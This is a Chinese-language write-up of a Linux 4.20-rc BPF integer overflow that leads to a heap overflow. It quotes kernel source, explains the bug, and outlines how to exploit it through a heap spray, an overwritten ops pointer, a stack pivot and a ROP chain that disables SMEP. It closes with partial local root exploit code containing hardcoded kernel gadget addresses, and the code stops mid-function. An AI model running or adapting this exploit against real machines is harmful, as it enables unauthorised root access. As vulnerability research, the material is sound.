Linux kernel 4.20 BPF 整数溢出漏洞分析

Linux kernel 4.20 BPF 整数溢出漏洞分析

该漏洞的发现者是ww9210师傅
漏洞影响的范围是Linux Kernel 4.20rc1-4.20rc4,主要Linux发行版并不受其影响。
基于linux-4.20-rc3版本代码:https://elixir.bootlin.com/linux/v4.20-rc3/source
这里主要参考P4nda师傅、钞sir师傅和bsauce师傅写的漏洞分析报告,十分感谢师傅们。

漏洞模块

漏洞主要存在于BPF模块中。该模块是用于支持用户态自定义包过滤方法的内核模块,是数据链路层的一种原始接口。

漏洞分析

主要的漏洞存在于map_create()和map_update_elem()中,其中主要的参数是attr。

/*
 * bpf() system call entry point (excerpt: the remaining switch cases and the
 * end of the function are elided in this listing).
 *
 * Copies at most sizeof(attr) bytes of the user-supplied attribute union into
 * a zero-initialised kernel copy, runs the security hook, then dispatches on
 * cmd to the per-command handler.
 */
SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
	union bpf_attr attr = {};
	int err;

	if (sysctl_unprivileged_bpf_disabled && !capable(CAP_SYS_ADMIN))
		return -EPERM;

	err = bpf_check_uarg_tail_zero(uattr, sizeof(attr), size);
	if (err)
		return err;
	size = min_t(u32, size, sizeof(attr));

	/* copy attributes from user space, may be less than sizeof(bpf_attr) */
	if (copy_from_user(&attr, uattr, size) != 0)
		return -EFAULT;

	err = security_bpf(cmd, &attr, size);
	if (err < 0)
		return err;

	switch (cmd) {
	case BPF_MAP_CREATE:       //path to the integer overflow
		err = map_create(&attr);
		break;
	case BPF_MAP_LOOKUP_ELEM:
		err = map_lookup_elem(&attr);
		break;
	case BPF_MAP_UPDATE_ELEM:
		err = map_update_elem(&attr);   //path to the heap overflow
		break;
	case BPF_MAP_DELETE_ELEM:
		err = map_delete_elem(&attr);
		break;
	case BPF_MAP_GET_NEXT_KEY:
		err = map_get_next_key(&attr);
		break;
		.......
}

bpf_attr是一个联合体,注意不同的命令(cmd)对应的处理函数会使用其中不同的结构体成员。

/*
 * Attribute block passed to the bpf() system call (excerpt: further members
 * are elided in this listing). Which anonymous struct is meaningful depends
 * on the handler that reads it.
 */
union bpf_attr {
	struct { /* layout read by map_create() */
		__u32	map_type;	/* one of enum bpf_map_type */
		__u32	key_size;	/* size of key in bytes */
		__u32	value_size;	/* size of value in bytes */
		__u32	max_entries;	/* max number of entries in a map */
		__u32	map_flags;	/* BPF_MAP_CREATE related
					 * flags defined above.
					 */
		__u32	inner_map_fd;	/* fd pointing to the inner map */
		__u32	numa_node;	/* numa node (effective only if
					 * BPF_F_NUMA_NODE is set).
					 */
		char	map_name[BPF_OBJ_NAME_LEN];
		__u32	map_ifindex;	/* ifindex of netdev to create on */
		__u32	btf_fd;		/* fd pointing to a BTF type data */
		__u32	btf_key_type_id;	/* BTF type_id of the key */
		__u32	btf_value_type_id;	/* BTF type_id of the value */
	};

	struct { /* layout read by map_update_elem() */
		__u32		map_fd;
		__aligned_u64	key;
		union {
			__aligned_u64 value;
			__aligned_u64 next_key;
		};
		__u64		flags;
	};
	.......
}

整数溢出漏洞

1.进入map_create函数看一下,发现find_and_alloc_map()函数创建了一个map结构体

/*
 * Handler for BPF_MAP_CREATE.
 *
 * Validates the attributes, allocates the map through find_and_alloc_map(),
 * copies the name, optionally attaches BTF information, then runs the
 * security, memlock and id steps before installing a file descriptor.
 *
 * Returns the value of bpf_map_new_fd() on success, or a negative errno. The
 * goto labels unwind in reverse order of the setup steps.
 */
static int map_create(union bpf_attr *attr)
{
	int numa_node = bpf_map_attr_numa_node(attr);
	struct bpf_map *map;
	int f_flags;
	int err;

	err = CHECK_ATTR(BPF_MAP_CREATE);
	if (err)
		return -EINVAL;

	f_flags = bpf_get_file_flag(attr->map_flags);
	if (f_flags < 0)
		return f_flags;

	if (numa_node != NUMA_NO_NODE &&
	    ((unsigned int)numa_node >= nr_node_ids ||
	     !node_online(numa_node)))
		return -EINVAL;

	/* find map type and init map: hashtable vs rbtree vs bloom vs ... */
	map = find_and_alloc_map(attr);    //the map is allocated in here
	if (IS_ERR(map))
		return PTR_ERR(map);

	err = bpf_obj_name_cpy(map->name, attr->map_name);
	if (err)
		goto free_map_nouncharge;

	atomic_set(&map->refcnt, 1);
	atomic_set(&map->usercnt, 1);

	if (attr->btf_key_type_id || attr->btf_value_type_id) {
		struct btf *btf;

		if (!attr->btf_key_type_id || !attr->btf_value_type_id) {
			err = -EINVAL;
			goto free_map_nouncharge;
		}

		btf = btf_get_by_fd(attr->btf_fd);
		if (IS_ERR(btf)) {
			err = PTR_ERR(btf);
			goto free_map_nouncharge;
		}

		err = map_check_btf(map, btf, attr->btf_key_type_id,
				    attr->btf_value_type_id);
		if (err) {
			btf_put(btf);
			goto free_map_nouncharge;
		}

		map->btf = btf;
		map->btf_key_type_id = attr->btf_key_type_id;
		map->btf_value_type_id = attr->btf_value_type_id;
	}

	err = security_bpf_map_alloc(map);
	if (err)
		goto free_map_nouncharge;

	err = bpf_map_init_memlock(map);
	if (err)
		goto free_map_sec;

	err = bpf_map_alloc_id(map);
	if (err)
		goto free_map;

	err = bpf_map_new_fd(map, f_flags);
	if (err < 0) {
		/* failed to allocate fd.
		 * bpf_map_put() is needed because the above
		 * bpf_map_alloc_id() has published the map
		 * to the userspace and the userspace may
		 * have refcnt-ed it through BPF_MAP_GET_FD_BY_ID.
		 */
		bpf_map_put(map);
		return err;
	}

	return err;

free_map:
	bpf_map_release_memlock(map);
free_map_sec:
	security_bpf_map_free(map);
free_map_nouncharge:
	btf_put(map->btf);
	map->ops->map_free(map);
	return err;
}

bpf_map结构体

/*
 * Generic map header. ops is the first member, so it sits at the very start
 * of the structure.
 */
struct bpf_map {
	/* The first two cachelines with read-mostly members of which some
	 * are also accessed in fast-path (e.g. ops, max_entries).
	 */
	const struct bpf_map_ops *ops ____cacheline_aligned;  //ops points to the table of function pointers (key point)
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u32 map_flags;
	u32 pages;
	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	struct btf *btf;
	bool unpriv_array;
	/* 55 bytes hole */

	/* The 3rd and 4th cacheline with misc members to avoid false sharing
	 * particularly with refcounting.
	 */
	struct user_struct *user ____cacheline_aligned;
	atomic_t refcnt;
	atomic_t usercnt;
	struct work_struct work;
	char name[BPF_OBJ_NAME_LEN];
};

注意这儿主要用到的几个结构是:

/* The four leading BPF_MAP_CREATE attribute fields this analysis relies on. */
struct {    /* Used by BPF_MAP_CREATE */
		__u32         map_type;
		__u32         key_size;    
		__u32         value_size;  
		__u32         max_entries; /* maximum number of entries in the map */
};

/*
 * Map type identifiers. No explicit values are given, so each enumerator's
 * value is its position in the list (BPF_MAP_TYPE_UNSPEC is 0); counting from
 * there, BPF_MAP_TYPE_QUEUE is 22 and BPF_MAP_TYPE_STACK is 23.
 */
enum bpf_map_type {
	BPF_MAP_TYPE_UNSPEC,
	BPF_MAP_TYPE_HASH,
	BPF_MAP_TYPE_ARRAY,
	BPF_MAP_TYPE_PROG_ARRAY,
	BPF_MAP_TYPE_PERF_EVENT_ARRAY,
	BPF_MAP_TYPE_PERCPU_HASH,
	BPF_MAP_TYPE_PERCPU_ARRAY,
	BPF_MAP_TYPE_STACK_TRACE,
	BPF_MAP_TYPE_CGROUP_ARRAY,
	BPF_MAP_TYPE_LRU_HASH,
	BPF_MAP_TYPE_LRU_PERCPU_HASH,
	BPF_MAP_TYPE_LPM_TRIE,
	BPF_MAP_TYPE_ARRAY_OF_MAPS,
	BPF_MAP_TYPE_HASH_OF_MAPS,
	BPF_MAP_TYPE_DEVMAP,
	BPF_MAP_TYPE_SOCKMAP,
	BPF_MAP_TYPE_CPUMAP,
	BPF_MAP_TYPE_XSKMAP,
	BPF_MAP_TYPE_SOCKHASH,
	BPF_MAP_TYPE_CGROUP_STORAGE,
	BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
	BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
	BPF_MAP_TYPE_QUEUE,
	BPF_MAP_TYPE_STACK,
	BPF_MAP_TYPE_SK_STORAGE,
	BPF_MAP_TYPE_DEVMAP_HASH,
};

2.打开find_and_alloc_map()函数,主要是调用ops虚函数表中的map_alloc函数指针。ops是根据map类型从bpf_map_types中取出、随后保存到map结构体中的虚函数表。这里需要注意一点,虽说表面上调用的是map_alloc,对于队列类型的map,实际执行的是queue_stack_map_alloc()函数,这一对应关系写在了下面的queue_map_ops结构体里。

/*
 * Look up the ops table for attr->map_type and allocate a map with it.
 *
 * Rejects out-of-range types and types with no registered ops, runs the
 * optional map_alloc_check hook, then calls map_alloc. On success the chosen
 * ops pointer and the type are stored in the returned map.
 *
 * Returns the new map or an ERR_PTR() value.
 */
static struct bpf_map *find_and_alloc_map(union bpf_attr *attr)
{
	const struct bpf_map_ops *ops;
	u32 type = attr->map_type;
	struct bpf_map *map;
	int err;

	if (type >= ARRAY_SIZE(bpf_map_types))
		return ERR_PTR(-EINVAL);
	type = array_index_nospec(type, ARRAY_SIZE(bpf_map_types));
	ops = bpf_map_types[type];         //the ops table is selected by map type
	if (!ops)
		return ERR_PTR(-EINVAL);

	if (ops->map_alloc_check) {
		err = ops->map_alloc_check(attr);
		if (err)
			return ERR_PTR(err);
	}
	if (attr->map_ifindex)
		ops = &bpf_map_offload_ops;
	map = ops->map_alloc(attr);    //the ops structs listed in this article show which function this really calls
	if (IS_ERR(map))
		return map;
	map->ops = ops;
	map->map_type = type;
	return map;
}

ops虚函数表

/*
 * Per-map-type table of operations. Every member is a function pointer;
 * map_alloc_check, map_alloc and map_release are the first three members,
 * in that order.
 */
struct bpf_map_ops {
	/* funcs callable from userspace (via syscall) */
	int (*map_alloc_check)(union bpf_attr *attr);
	struct bpf_map *(*map_alloc)(union bpf_attr *attr);
	void (*map_release)(struct bpf_map *map, struct file *map_file);
	void (*map_free)(struct bpf_map *map);
	int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
	void (*map_release_uref)(struct bpf_map *map);

	/* funcs callable from userspace and from eBPF programs */
	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
	int (*map_delete_elem)(struct bpf_map *map, void *key);
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
	int (*map_pop_elem)(struct bpf_map *map, void *value);
	int (*map_peek_elem)(struct bpf_map *map, void *value);

	/* funcs called by prog_array and perf_event_array map */
	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
				int fd);
	void (*map_fd_put_ptr)(void *ptr);
	u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
	u32 (*map_fd_sys_lookup_elem)(void *ptr);
	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
				  struct seq_file *m);
	int (*map_check_btf)(const struct bpf_map *map,
			     const struct btf_type *key_type,
			     const struct btf_type *value_type);
};

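注意attr中的map_type字段要是BPF_MAP_TYPE_QUEUE(其ops为下面的queue_map_ops),才会走到queue_stack_map_alloc()触发漏洞。另外,按上面枚举的顺序,exp中使用的0x17(23)对应的其实是BPF_MAP_TYPE_STACK;从后面map_update_elem()的分支可以看到QUEUE和STACK走的是同一条map_push_elem路径,推测STACK类型的ops同样使用queue_stack_map_alloc()(本文未列出,有待对照源码确认)。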

/* Pairs BPF_MAP_TYPE_QUEUE with queue_map_ops; presumably this is how the bpf_map_types[] entry is generated -- confirm against the kernel source. */
BPF_MAP_TYPE(BPF_MAP_TYPE_QUEUE, queue_map_ops)

map_create()和queue_stack_map_alloc()相关的结构体

/*
 * Operations table for queue maps. map_alloc resolves to
 * queue_stack_map_alloc and map_push_elem to queue_stack_map_push_elem,
 * the two functions examined in this analysis.
 */
const struct bpf_map_ops queue_map_ops = {
	.map_alloc_check = queue_stack_map_alloc_check,
	.map_alloc = queue_stack_map_alloc,
	.map_free = queue_stack_map_free,
	.map_lookup_elem = queue_stack_map_lookup_elem,
	.map_update_elem = queue_stack_map_update_elem,
	.map_delete_elem = queue_stack_map_delete_elem,
	.map_push_elem = queue_stack_map_push_elem,
	.map_pop_elem = queue_map_pop_elem,
	.map_peek_elem = queue_map_peek_elem,
	.map_get_next_key = queue_stack_map_get_next_key,
};

3.所以进入queue_stack_map_alloc()来看看,这也是整数溢出漏洞所在的地方,涉及到bpf_queue_stack结构体。
这里我们发现在下面[1]处,计算申请大小时用的是qs结构体的大小加上(value的大小乘以元素个数size)。由于size的类型是u32,只占4个字节,而max_entries是用户可控的输入,当我们将其填充为0xffffffff时,size = max_entries + 1会发生回绕,使得size为0。于是queue_size只剩下sizeof(*qs),在[2]处实际只申请了qs结构体自身大小的空间,申请到的堆空间过小。

/*
 * map_alloc implementation for queue maps, quoted as it appears in the
 * vulnerable version under analysis.
 *
 * Computes the allocation size as sizeof(*qs) plus value_size * size, where
 * size = max_entries + 1 is held in a u32. Charges the page cost, allocates
 * the area, zeroes the header and initialises the embedded map from attr.
 *
 * Returns a pointer to the embedded struct bpf_map or an ERR_PTR() value.
 */
static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
{
	int ret, numa_node = bpf_map_attr_numa_node(attr);
	struct bpf_queue_stack *qs;
	u32 size, value_size;
	u64 queue_size, cost;

	size = attr->max_entries + 1;            //<--- here: u32 addition, wraps to 0 when max_entries is 0xffffffff
	value_size = attr->value_size;

	queue_size = sizeof(*qs) + (u64) value_size * size;  //[1] with size == 0 this is just sizeof(*qs)

	cost = queue_size;
	if (cost >= U32_MAX - PAGE_SIZE)
		return ERR_PTR(-E2BIG);

	cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;

	ret = bpf_map_precharge_memlock(cost);
	if (ret < 0)
		return ERR_PTR(ret);

	qs = bpf_map_area_alloc(queue_size, numa_node);    //[2] allocation sized by queue_size
	if (!qs)
		return ERR_PTR(-ENOMEM);

	memset(qs, 0, sizeof(*qs));

	bpf_map_init_from_attr(&qs->map, attr);     //initialise qs->map

	qs->map.pages = cost;
	qs->size = size;

	raw_spin_lock_init(&qs->lock);

	return &qs->map;
}

bpf_queue_stack结构体

/*
 * Queue/stack map object: the generic map header comes first, followed by
 * the lock, the head/tail indices, the slot count and a trailing
 * zero-length elements array.
 */
struct bpf_queue_stack {
	struct bpf_map map;
	raw_spinlock_t lock;
	u32 head, tail;
	u32 size; /* max_entries + 1 */

	char elements[0] __aligned(8);
};

bpf_map_init_from_attr()是个初始化函数,把attr中的字段拷贝到map中(raw_spin_lock_init()则用于初始化qs->lock):

/*
 * Copy the creation attributes (type, key/value sizes, max_entries, flags)
 * from attr into map, and set map->numa_node from
 * bpf_map_attr_numa_node(attr).
 */
void bpf_map_init_from_attr(struct bpf_map *map, union bpf_attr *attr)
{
	map->map_type = attr->map_type;
	map->key_size = attr->key_size;
	map->value_size = attr->value_size;
	map->max_entries = attr->max_entries;
	map->map_flags = attr->map_flags;
	map->numa_node = bpf_map_attr_numa_node(attr);
}

堆溢出漏洞

1.现在我们知道,我们申请到了一个过小的堆块,而value的大小是我们输入的,那么在每一次更新value的时候,就可能出现问题。查看BPF模块,发现了map_update_elem()函数。主要逻辑就是申请value堆块,把用户数据拷贝进去,然后添加进map中。注意这里attr使用的结构体与上面map_create()调用时不同。

/*
 * Handler for BPF_MAP_UPDATE_ELEM.
 *
 * Resolves the map from attr->map_fd, copies the key and a value_size-byte
 * value from user space into kernel buffers, then dispatches to the update
 * routine for the map's type. Queue and stack maps go through
 * ops->map_push_elem.
 *
 * Returns the result of the selected update routine, or a negative errno
 * from the earlier steps. The key and value buffers are freed and the fd
 * reference dropped on the way out.
 */
static int map_update_elem(union bpf_attr *attr)
{
	void __user *ukey = u64_to_user_ptr(attr->key);
	void __user *uvalue = u64_to_user_ptr(attr->value);
	int ufd = attr->map_fd;   //fd that identifies the map
	struct bpf_map *map;
	void *key, *value;
	u32 value_size;
	struct fd f;
	int err;

	if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM))
		return -EINVAL;

	f = fdget(ufd);
	map = __bpf_map_get(f);
	if (IS_ERR(map))
		return PTR_ERR(map);

	if (!(f.file->f_mode & FMODE_CAN_WRITE)) {
		err = -EPERM;
		goto err_put;
	}

	key = __bpf_copy_key(ukey, map->key_size);
	if (IS_ERR(key)) {
		err = PTR_ERR(key);
		goto err_put;
	}

	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE)
		value_size = round_up(map->value_size, 8) * num_possible_cpus();
	else
		value_size = map->value_size;

	err = -ENOMEM;
	value = kmalloc(value_size, GFP_USER | __GFP_NOWARN);   //allocate a kernel buffer for the value
	if (!value)
		goto free_key;

	err = -EFAULT;
	if (copy_from_user(value, uvalue, value_size) != 0)  //copy uvalue from user space into value
		goto free_value;

	/* Need to create a kthread, thus must support schedule */
	if (bpf_map_is_dev_bound(map)) {
		err = bpf_map_offload_update_elem(map, key, value, attr->flags);
		goto out;
	} else if (map->map_type == BPF_MAP_TYPE_CPUMAP ||
		   map->map_type == BPF_MAP_TYPE_SOCKHASH ||
		   map->map_type == BPF_MAP_TYPE_SOCKMAP) {
		err = map->ops->map_update_elem(map, key, value, attr->flags);
		goto out;
	}

	/* must increment bpf_prog_active to avoid kprobe+bpf triggering from
	 * inside bpf map update or delete otherwise deadlocks are possible
	 */
	preempt_disable();
	__this_cpu_inc(bpf_prog_active);
	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) {
		err = bpf_percpu_hash_update(map, key, value, attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) {
		err = bpf_percpu_array_update(map, key, value, attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) {
		err = bpf_percpu_cgroup_storage_update(map, key, value,
						       attr->flags);
	} else if (IS_FD_ARRAY(map)) {
		rcu_read_lock();
		err = bpf_fd_array_map_update_elem(map, f.file, key, value,
						   attr->flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) {
		rcu_read_lock();
		err = bpf_fd_htab_map_update_elem(map, f.file, key, value,
						  attr->flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) {
		/* rcu_read_lock() is not needed */
		err = bpf_fd_reuseport_array_update_elem(map, key, value,
							 attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
		   map->map_type == BPF_MAP_TYPE_STACK) {
		err = map->ops->map_push_elem(map, value, attr->flags);  //queue/stack maps call map_push_elem; see the ops struct for the target
	} else {
		rcu_read_lock();
		err = map->ops->map_update_elem(map, key, value, attr->flags);
		rcu_read_unlock();
	}
	__this_cpu_dec(bpf_prog_active);
	preempt_enable();
	maybe_wait_bpf_programs(map);
out:
free_value:
	kfree(value);
free_key:
	kfree(key);
err_put:
	fdput(f);
	return err;
}

2.看了ops的结构体,map_push_elem对应的就是queue_stack_map_push_elem函数,所以关键漏洞函数queue_stack_map_push_elem()出现了:它就是往struct bpf_queue_stack后面的elements区域不断写入数据。
由分析可以推测,map(struct bpf_queue_stack的第一个字段)是用来管理后面多个小块的头部结构,有点像报文头。其中value_size是每一个小块的大小,max_entries是小块的数量,每次可以写入一个小块的内容。qs中除了map结构体之外,还有head字段记录下一个可插入块的编号,以及elements数组作为数据区的起始位置。所以在下面标注1的位置,用(elements起始地址 + head * 每块大小)计算出了当前可插入块的位置。由于上面的整数溢出,qs只分配了一个能存下qs结构体自身的堆块,所以当可控的value_size > 256 - ((char *)qs->elements - (char *)qs)时就会发生越界拷贝,造成堆溢出。

/*
 * map_push_elem implementation for queue maps.
 *
 * Under qs->lock, copies map.value_size bytes from value into the slot at
 * elements[head * value_size] and advances head, wrapping it to 0 once it
 * reaches qs->size. If the map is full, the push fails with -E2BIG unless
 * BPF_EXIST is set, in which case tail is advanced first.
 *
 * Returns 0 on success, -EINVAL for unsupported flags, -E2BIG when full.
 * The destination is not checked against the size of the allocation.
 */
static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
				     u64 flags)
{
	struct bpf_queue_stack *qs = bpf_queue_stack(map);
	unsigned long irq_flags;
	int err = 0;
	void *dst;

	/* BPF_EXIST is used to force making room for a new element in case the
	 * map is full
	 */
	bool replace = (flags & BPF_EXIST);

	/* Check supported flags for queue and stack maps */
	if (flags & BPF_NOEXIST || flags > BPF_EXIST)
		return -EINVAL;

	raw_spin_lock_irqsave(&qs->lock, irq_flags);

	if (queue_stack_map_is_full(qs)) {
		if (!replace) {
			err = -E2BIG;
			goto out;
		}
		/* advance tail pointer to overwrite oldest element */
		if (unlikely(++qs->tail >= qs->size))
			qs->tail = 0;
	}

	dst = &qs->elements[qs->head * qs->map.value_size];   //1: address of the slot to fill
	memcpy(dst, value, qs->map.value_size);     //heap overflow happens here: out-of-bounds copy

	if (unlikely(++qs->head >= qs->size))
		qs->head = 0;

out:
	raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
	return err;
}

漏洞利用思路

这边我们仅讨论绕过smep保护达成提权的方法。
1.首先确定每一次create的堆的大小,调试可知是0x100

pwndbg> x/40gx 0xffff88800fa2b500
0xffff88800fa2b500:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b510:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b520:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b530:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b540:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b550:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b560:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b570:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b580:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b590:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5a0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5b0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5c0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5d0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5e0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5f0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b600:	0xffff88800f9a1980	0x0000000000000000
0xffff88800fa2b610:	0xffff88800f4a2640	0xffff88800fa2b618
0xffff88800fa2b620:	0xffff88800fa2b618	0x0000000200000000
0xffff88800fa2b630:	0x0000000000000000	0xffffffff82107d20

2.由于内核的堆管理用的是伙伴算法+slub算法,即相同kmem_cache的内存块是从同一个内存页上切出来的,那么我们大量分配同样大小的堆块(也就是堆喷射),总有一块会和我们最初分配的堆块相邻。因为整数溢出导致的堆溢出长度可控,且经过调试我们知道,由于需要对齐,0x100-0xd0(bpf_queue_stack的长度)=0x30,所以写入超过0x30字节即可覆盖相邻堆块开头的ops虚函数表指针。
ops虚函数表如下

/*
 * Per-map-type table of operations (repeated here for the exploitation
 * discussion). Every member is a function pointer; map_release is the third
 * member, after map_alloc_check and map_alloc.
 */
struct bpf_map_ops {
	/* funcs callable from userspace (via syscall) */
	int (*map_alloc_check)(union bpf_attr *attr);
	struct bpf_map *(*map_alloc)(union bpf_attr *attr);
	void (*map_release)(struct bpf_map *map, struct file *map_file);
	void (*map_free)(struct bpf_map *map);
	int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
	void (*map_release_uref)(struct bpf_map *map);

	/* funcs callable from userspace and from eBPF programs */
	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
	int (*map_delete_elem)(struct bpf_map *map, void *key);
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
	int (*map_pop_elem)(struct bpf_map *map, void *value);
	int (*map_peek_elem)(struct bpf_map *map, void *value);

	/* funcs called by prog_array and perf_event_array map */
	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
				int fd);
	void (*map_fd_put_ptr)(void *ptr);
	u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
	u32 (*map_fd_sys_lookup_elem)(void *ptr);
	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
				  struct seq_file *m);
	int (*map_check_btf)(const struct bpf_map *map,
			     const struct btf_type *key_type,
			     const struct btf_type *value_type);
};

3.虚函数表里全部都是函数指针,所以我们可以利用堆溢出把相邻map的ops指针改为指向我们伪造的虚函数表,并把其中一个函数指针填为一段gadget的地址,用它把rsp切换到我们布置好的内存上(即栈迁移),然后继续执行我们的rop链。
这里我们采用的栈迁移gadget是:

   0xffffffff81954dc8:	xchg   esp,eax
   0xffffffff81954dc9:	ret    0x674

所以我们的rop链需要布置在0x81954dc8+0x674之后。Rop链就是我们平常使用的那一套:先改写cr4,使smep保护失效,随即执行

commit_creds(prepare_kernel_cred(0))

来进行权限提升,最后iretq返回用户空间即可。

exp

这里是我重写的exp,基本没什么变动,主要是加了些注释,方便理解整个exp的流程。这里不得不说,P4nda师傅的exp写的很棒。基本思路是利用整数溢出和堆喷射来创建出很多堆块,根据linux的内存分配规则,kmem_cache是kmalloc-256,所以一个物理页可以有相邻的堆块,通过堆溢出来覆盖后面堆块的ops虚函数表(map_release()),那么大概率我们可以在close()的时候,触发漏洞。

#define _GNU_SOURCE
#define SPRAY_NUMBER 14

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
/*
 * Hard-coded kernel text addresses and layout constants used by the proof of
 * concept. NOTE(review): these are presumably specific to the author's test
 * kernel build -- confirm before assuming they apply anywhere else.
 */
#define native_write_cr4 0xffffffff810037d5// 0xffffffff81097fcc
#define POPRDX 0xffffffff81002dda
#define DUMMY 0
#define PREPARE_KERNEL_CRED 0xFFFFFFFF810E3D40 //0xffffffff810e3670
#define COMMIT_CREDS  0xFFFFFFFF810E3AB0 //0xffffffff810e33e0
#define poprdiret 0xffffffff810013b9
#define popraxret 0xffffffff81029c71
#define swapgs 0xffffffff81c00d5a//0xffffffff81c0095f
#define iretq 0xffffffff8106d8f4
#define stack_pivot_gadget 0xffffffff81954dc8
#define stack_top_offset 0x674
#define krop_base_to_map 0x81954000
int rop_start=0x81954dc8-0x81954000+0x674;       //distance from krop_base_mapped to rop_chain
void* krop_base_mapped;

unsigned long user_cs, user_ss, user_rflags;

/*
 * Store the current cs and ss selectors and the flags register into the
 * globals user_cs, user_ss and user_rflags.
 */
static void save_state()
{
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
        :
        : "memory");
}

/*
 * Run id(1) to show the current identity, then replace this process with
 * /bin/sh.
 */
void get_shell()
{
    char *const path = "/bin/sh";
    char *argv[2];

    system("id");
    argv[0] = path;
    argv[1] = NULL;
    execve(path, argv, NULL);
}

/*
 * Function-pointer types and pointers for the two kernel routines, bound to
 * the hard-coded COMMIT_CREDS and PREPARE_KERNEL_CRED addresses.
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

/* Call prepare_kernel_cred(0) and pass its result to commit_creds(). */
void get_root_payload(void)
{
    unsigned long new_cred = prepare_kernel_cred(0);

    commit_creds(new_cred);
}
/*
 * ROP chain image copied into the mapped region by prepare_krop(). The last
 * four slots are placeholders that prepare_krop() fills in at run time.
 */
unsigned long rop_chain[] = {
    popraxret,
    0x6f0,             //author's note: commonly used cr4 value that turns SMEP off
    0xffffffff81001c51,//native_write_cr4,
    poprdiret,
    0,
    PREPARE_KERNEL_CRED,
    0xffffffff81001c50, //: pop rsi ; ret
    poprdiret,
    0xffffffff81264e0b,//: push rax; push rsi; ret; //0xffffffff812646fb, //: push rax ; push rsi ; ret
    COMMIT_CREDS,
    swapgs,
    0x246,
    iretq,
    (unsigned long)&get_shell,
    0,//user_cs,
    0,//user_rflags,
    0,//krop_base_mapped + 0x4000,
    0//user_ss
};

void * fakestack;
/*
 * Map two anonymous regions (0x8000 bytes at krop_base_to_map and 0x8000
 * bytes at 0xa000000000), write to the first word of each page in them, place
 * the pivot gadget address at fakestack+0x10, fill the four trailing
 * rop_chain slots from the saved user state, and copy rop_chain to
 * krop_base_mapped+rop_start.
 *
 * NOTE(review): the failure check compares a pointer with 0 using '<';
 * mmap() reports failure as MAP_FAILED, so this branch likely never runs --
 * confirm. The second mmap() result is not checked at all.
 */
void prepare_krop(){
    krop_base_mapped=mmap((void *)krop_base_to_map,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
    if (krop_base_mapped<0){
        perror("mmap failed");
    }
    fakestack=mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
    *(unsigned long*)0x0000000081954dc8=popraxret;
    *(unsigned long*)krop_base_to_map = 0;
    *(unsigned long*)(krop_base_to_map+0x1000) = 0;     //write 0 to the first word of every page
    *(unsigned long*)(krop_base_to_map+0x2000) = 0;
